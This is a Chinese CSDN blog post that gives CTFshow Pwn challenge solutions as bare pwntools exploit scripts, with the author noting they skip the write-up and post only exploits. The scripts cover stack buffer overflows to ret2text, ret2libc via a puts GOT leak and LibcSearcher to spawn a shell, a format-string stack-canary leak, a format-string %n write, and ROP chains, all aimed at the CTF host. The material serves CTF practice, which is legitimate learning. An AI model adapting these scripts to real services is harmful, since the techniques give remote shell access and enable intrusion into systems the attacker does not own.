CTFshow——Pwn(1)

最新推荐文章于 2024-04-16 19:19:24 发布
最新推荐文章于 2024-04-16 19:19:24 发布
阅读量390 收藏 2
点赞数
分类专栏: # CTFshow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114041790
版权

CTFshow——Pwn(1)

有点懒不想写write up了。只有exploit。

PWN签到题

from pwn import *
p = remote('xxx',xxx)
p.interactive()

pwn02

from pwn import *
p =remote("pwn.chall.ctf.show",28006)
p.sendline('a'*(0x9+4) + p32(0x0804850F))
p.interactive()

pwn03

from pwn import *
from LibcSearcher import *
p = remote("pwn.chall.ctf.show",28063)
elf = ELF('./stack1')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x080484DF
payload = 'a' * (9 + 4) + p32(puts_plt) + p32(main) + p32(puts_got)
p.recv()
p.sendline(payload)
puts_addr = u32(p.recv(4))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

payload = 'a' * (9 + 4) + p32(system) + p32(main) + p32(binsh)
p.recv()
p.sendline(payload)
p.interactive()

pwn04

from pwn import *
#p = process('./ex2')
p =remote("pwn.chall.ctf.show",28190)
p.recv()
leak_canary = "%31$x"
p.sendline(leak_canary)
canary = int(p.recv(),16)
print(hex(canary))
getshell = "a" * 100 + p32(canary) + "b" * 12 + p32(0x0804859B)
p.sendline(getshell)
p.interactive()

pwn05

from pwn import *
p = remote("pwn.chall.ctf.show",28041)
flag = 0x08048486
payload = 'a' * (0x14 + 4) + p32(flag)
p.sendline(payload)
p.interactive()

pwn06

glibc2.27版本以上需要栈平衡。rsp % 0x10 == 0.所以加了一个ret保证堆栈平衡。

from pwn import *
#p =remote("pwn.chall.ctf.show",28012)
p = remote('./pwn (1)')
gdb.attach(p, 'b *0x00000000004005B4')
payload = 'a' * (0xc + 8) + p64(0x0400577) + p64(0x0400577)
p.sendline(payload)
p.interactive()

pwn07

from pwn import *
from LibcSearcher import *
elf = ELF('./pwn')
p = remote('pwn.chall.ctf.show',28081)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
pop_rdi = 0x00000000004006e3
ret = 0x00000000004004c6
payload = 'a' * (0xc + 0x8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)

p.sendline(payload)
p.recvline()
puts_addr = u64(p.recvuntil('\n')[:-1].ljust(8,'\0'))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

payload = 'a' * (0xc + 0x8) + p64(ret) +p64(pop_rdi) + p64(binsh) + p64(system)
p.sendline(payload)
p.interactive()

01栈溢出之ret2text

from pwn import *
p =remote('pwn.chall.ctf.show',28135)
ret = 0x00000000004004fe
payload = 'a' * (0x80 + 8) + p64(ret) +p64(0x000000000400637)
p.sendline(payload)
p.interactive()

pwn10

from pwn import *
p = remote('pwn.chall.ctf.show',28120)
num_addr = 0x0804A030
payload = p32(num_addr) + '%12c%7$n'
p.sendline(payload)
p.interactive()

2a1

# 20.21.2.24还没搞出来。hhhh明天再看看有点困啊
Y-peak
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
CTFshow-pwn入门-前置基础pwn29-pwn31
T1ngSh0w的博客
06-21 1516
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 3325
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1076
本文主要详解CTFshow中pwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
mprotect+ret2csu
2301_79880074的博客
01-26 1718
寒假学习计划第一轮,通过四道典型题回顾复习。
CTFshow PWN入门 Test_your_nc
2301_79612324的博客
12-24 401
需使用chmod +x给文件添加可执行权限system()函数里参数为"cat /ctfshow_flag",直接nc运行即可得到flag。
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn1 一道pwn练习题
05-07
pwn练习题
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
CTFshow PWN1
qq_60737948的博客
10-03 139
pwn开始的地方
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9463
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
CTFshow-pwn入门-前置基础pwn5 - pwn12
T1ngSh0w的博客
06-17 1169
CTFshow-pwn入门-前置基础-pwn5-pwn12
CTFshow-pwn入门-栈溢出pwn49(静态链接pwn-mprotect函数的应用)
T1ngSh0w的博客
07-08 1245
ctfshow-pwn入门-栈溢出pwn49-mprotect函数静态链接pwn的应用
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1897
ctfshow pwn入门-前置基础pwn13-pwn19
CTFshow-PWN入门-Test_your_nc详解
weixin_63576152的博客
07-29 1374
本文主要详解CTFshow中pwn入门第一块内容Test_your_nc的五道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境(小编的轻薄本已经容不提供的专用虚拟机了QAQ)
CTFshow-PWN-前置基础(pwn13-pwn16)
最新发布
Welcome To Myon'Blog !
04-16 1174
如何使用GCC?编译运行后即可获得flag下载附件,是一个 .c 文件定义了一个字符数组 flag[],其中包含一系列 ASCII 码值,最后以NULL字符(\0)结尾,表示字符串的结束,使用 printf() 函数,其中的 %s 是格式化字符串中的一个格式说明符,用于指示 printf() 函数要打印的内容是一个字符串,将字符数组以字符串的形式输出。编译好后我们直接使用 ./ 执行得到 flag:ctfshow{hOw_t0_us3_GCC?
PWN-PRACTICE-CTFSHOW-1
P1umH0的博客
01-13 380
PWN-PRACTICE-CTFSHOW-1PWN签到题pwn02pwn03pwn04 PWN签到题 nc连上去就会打印flag pwn02 栈溢出,覆盖返回地址为后门函数stack起始地址即可 # -*- coding:utf-8 -*- from pwn import * #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28194) elf=ELF("./pwn1") stack=0x0804850F io.recvuntil("3
ctfpwn入门第一次学堆
2301_79880074的博客
03-08 850
先通过一篇博客去大概的了解一下堆的前置基础知识吧,我做了一道2.23版本的堆题,在诸多版本中算是比较简单的一个题了。
ctfshow的pwn2
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值